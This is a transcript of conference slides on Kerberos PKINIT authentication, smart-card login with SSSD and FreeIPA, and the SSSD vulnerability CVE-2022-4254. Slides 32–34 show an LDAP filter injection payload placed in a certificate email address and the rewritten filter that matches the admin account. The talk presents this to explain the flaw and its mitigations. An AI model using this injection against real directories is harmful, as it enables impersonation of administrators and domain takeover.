Kerberos PKINIT: what, why, and how (to break it) [Everything Open 2023]

Transcript

1. Kerberos PKINIT
   what, why and how (to break it)
   Fraser Tweedale
   @[email protected]
   March 15, 2023
   

   View Slide

2. Agenda
   Kerberos overview
   Kerberos PKINIT: overview and demo
   PKINIT security considerations
   Attack demo: CVE-2022-4254
   

   View Slide

3. Kerberos - overview
   Authentication protocol based on symmetric cryptography
   Single sign-on: authenticate once, access many services
   Started at MIT (1988), v5 (1993), RFC 41201 (2005)
   Major implementations: MIT Kerberos2, Microsoft Active Directory,
   Heimdal3, FreeIPA4 / Identity Management in RHEL
   1https://www.rfc-editor.org/rfc/rfc4120
   2https://web.mit.edu/kerberos/
   3https://github.com/heimdal/heimdal
   4https://www.freeipa.org
   

   View Slide

4. Kerberos - protocol
   Parties: client, Key Distribution Centre (KDC), service
   KDC = Authentication Service (AS) + Ticket Granting Service (TGS)
   Users, services, KDC are represented as principals in a realm
   Each principle has a long-term secret key, shared with the KDC
   users derive it from a password
   hosts/services store it in a file ("keytab")
   Authentication tokens are called tickets
   

   View Slide

5. Kerberos - protocol - parties
   

   View Slide

6. Kerberos - protocol - Authentication Service request
   

   View Slide

7. Kerberos - protocol - Authentication Service response
   

   View Slide

8. Kerberos - protocol - after AS exchange
   

   View Slide

9. Kerberos - protocol - Ticket-Granting Service request
   

   View Slide

10. Kerberos - Ticket-Granting Service response
    

    View Slide

11. Kerberos - after TGS exchange
    

    View Slide

12. Kerberos - application request
    

    View Slide

13. Kerberos - application session
    

    View Slide

14. Kerberos - extensions and integrations
    Pre-authentication framework5
    integrate additional authentication mechanisms e.g. OTP6
    GSSAPI mechanism7
    SASL mechanism8
    HTTP authentication (SPNEGO)9
    Authentication Indicator10
    Cross-realm authentication (trusts)
    5RFC 6113 - https://www.rfc-editor.org/rfc/rfc6113
    6https://web.mit.edu/kerberos/krb5-devel/doc/admin/otp.html
    7RFC 4121 - https://www.rfc-editor.org/rfc/rfc4121
    8RFC 4752 - https://www.rfc-editor.org/rfc/rfc4752
    9RFC 4178 - https://www.rfc-editor.org/rfc/rfc4178
    10RFC 8129 - https://www.rfc-editor.org/rfc/rfc8129
    

    View Slide

15. Kerberos - advantages
    Single sign-on: improve efficiency, reduce password fatigue
    Client exposes long-term secret only once (until TGT expires)
    Resistant to replay attacks
    Works well for HTTP and "bare" network protocols
    

    View Slide

16. Kerberos - problems
    Passwords are not great
    Password / keytab rotation is burdensome
    

    View Slide

17. PKINIT - overview
    Public Key Cryptography for Initial Authentication in Kerberos11
    Client uses asymmetric cryptography to authenticate to KDC
    Client presents X.50912 certificate and signs message
    KDC verifies certificate, signature and client binding
    KDC encrypts response using either:
    Diffie-Hellman (DH) or analogous key agreement algorithm
    other public-key encryption algorithm
    11RFC 4556 - https://www.rfc-editor.org/rfc/rfc4556
    12RFC 5280 - https://www.rfc-editor.org/rfc/rfc5280
    

    View Slide

18. PKINIT - protocol - Authenticate Service request
    

    View Slide

19. PKINIT - protocol - Authentication Service response
    

    View Slide

20. PKINIT - protocol - after AS exchange
    

    View Slide

21. PKINIT - user experience
    CLI: kinit -X X509_user_identity=FILE:cert.pem,key.pem
    Smart Card workstation login
    SSSD13 can integrate with Linux login managers (e.g. GDM)
    Prompt for PIN, if required
    TGT acquired during login
    Lock screen when Smart Card detached (optional)
    Windows offers a similiar experience
    13https://sssd.io/
    

    View Slide

22. Smart Card login with SSSD (Fedora / RHEL)
    Enable via authselect(8):
    % a u t h s e l e c t enable −f e a t u r e \
    with−smartcard [− r e q u i r e d ]
    with−smartcard −lock −on−removal
    Update /etc/sssd/sssd.conf:
    [ pam ]
    pam_cert_auth = True
    pam_cert_db_path =
    

    View Slide

23. SSSD PKINIT login with FreeIPA provider
    Default: exact certificate match only
    match the LDAP userCertificate attribute
    Optional: certificate mapping rules
    use attributes in certificate to look up principal
    ipa certmaprule-add certmap \
    --maprule "(fqdn={subject_dns_name})"
    caveat: only one active mapping rule will be used
    Client certs can be signed by internal or third-party CA
    

    View Slide

24. Demo
    

    View Slide

25. PKINIT - advantages
    No more passwords / client shared secret
    Key can reside on Smart Card (e.g. Yubikey) / TPM / HSM
    The rest of the protocol (after AS Exchange) is unchanged
    

    View Slide

26. PKINIT - complexities
    X.509 PKI required
    Renewal considerations
    Revocation checking is hard (or time consuming)
    Hardware (e.g. Smart Cards) → additional cost
    Binding the public key to the principal - how?
    

    View Slide

27. PKINIT - key binding
    In addition to validating the client’s signature, the KDC MUST also
    check that the client’s public key used to verify the client’s
    signature is bound to the client principal name specified in the AS-
    REQ as follows:
    1. If the KDC has its own binding between either the client’s
    signature-verification public key or the client’s certificate and
    the client’s Kerberos principal name, it uses that binding.
    2. Otherwise, if the client’s X.509 certificate contains a Subject
    Alternative Name (SAN) extension carrying a KRB5PrincipalName
    (defined below) in the otherName field of the type GeneralName
    [RFC3280], it binds the client’s X.509 certificate to that name.
    

    View Slide

28. PKINIT - key binding
    Encode principal name in certificate (KRB5PrincipalName SAN)
    Associate certificate/key with principal in database
    administrative overhead due to renewal/rekey
    Other heuristics; for example:
    if certificate has dNSName SAN, look for that host principal
    if certificate has rfc822Name (email address) SAN, look for the corresonding
    user principal
    Better not mess this up!
    

    View Slide

29. CVE-2022-4254
    

    View Slide

30. CVE-2022-4254 - what happened?
    LDAP filter injection14
    FreeIPA not vulnerable in default configuration
    only exact certificate match is enabled by default
    Bug introduced in SSSD v1.15.3 and resolved in v2.3.1
    Will also be fixed in of v1.16.6, if/when released
    14CWE-90 - https://cwe.mitre.org/data/definitions/90.html
    

    View Slide

31. CVE-2022-4254 - LDAP filter
    (&
    (|
    (objectClass= krbprincipalaux )
    (objectClass=krbprincipal)
    (objectClass= ipakrbprincipal )
    )
    (|
    ( ipaKrbPrincipalAlias = host/[email protected] )
    ( krbPrincipalName : caseIgnoreIA5Match := host/rhel78 -0. [email protected]
    )
    ( fqdn=*.ipa.test )
    )
    

    View Slide

32. What if your email address is
    "bogus)(uid=admin)(cn="@ipa.test
    

    View Slide

33. . . . and your certmap rule looks like
    (|(mail={subject_rfc822_name})(entryDN={subject_dn})
    

    View Slide

34. CVE-2022-4254 - domain takeover
    (&
    (|
    (objectClass= krbprincipalaux )
    (objectClass=krbprincipal)
    (objectClass= ipakrbprincipal )
    )
    (|
    ( ipaKrbPrincipalAlias = [email protected] )
    ( krbPrincipalName : caseIgnoreIA5Match := [email protected])
    )
    (|
    (mail =" bogus)
    ( uid=admin )
    (cn=" @ipa.test)
    (entrydn=CN=alice ,O=IPA.TEST 202211171708)
    )
    

    View Slide

35. CVE-2022-4254 - mitigations
    Upgrade to fixed/patched releases of SSSD
    and-list rules are harder to exploit than or-list
    Audit what data get included in certs, and how
    Use exact certificate matching
    

    View Slide

36. PKINIT - security considerations
    Properly escape/sanitise all inputs, always.
    Review CA trust, profiles, and validation behaviour
    Which CAs do you trust? Who can issue certificates?
    How do you validate the data that go into a certificate?
    Can attributes be influenced by users or other parties?
    Just because a value is valid does not mean it’s benign
    Key/principal binding is a critical aspect of PKINIT security
    

    View Slide

37. Links / resources
    certmap vulnerability:
    Writeup: https://is.gd/CVE_2022_4254
    Red Hat CVE database:
    https://access.redhat.com/security/cve/CVE-2022-4254
    Related effort: FreeIPA FIDO2/Webauthn support
    FOSDEM 2023 talk: Enabling FIDO2/WebAuthn support for remotely
    managed users15
    15https://fosdem.org/2023/schedule/event/security_remote_fido/
    

    View Slide

38. © 2023 Red Hat, Inc.
    Except where otherwise noted this work is licensed under
    http://creativecommons.org/licenses/by/4.0/
    Slides speakerdeck.com/frasertweedale
    Blog frasertweedale.github.io/blog-redhat
    Email [email protected]
    Fediverse @[email protected]
    

    View Slide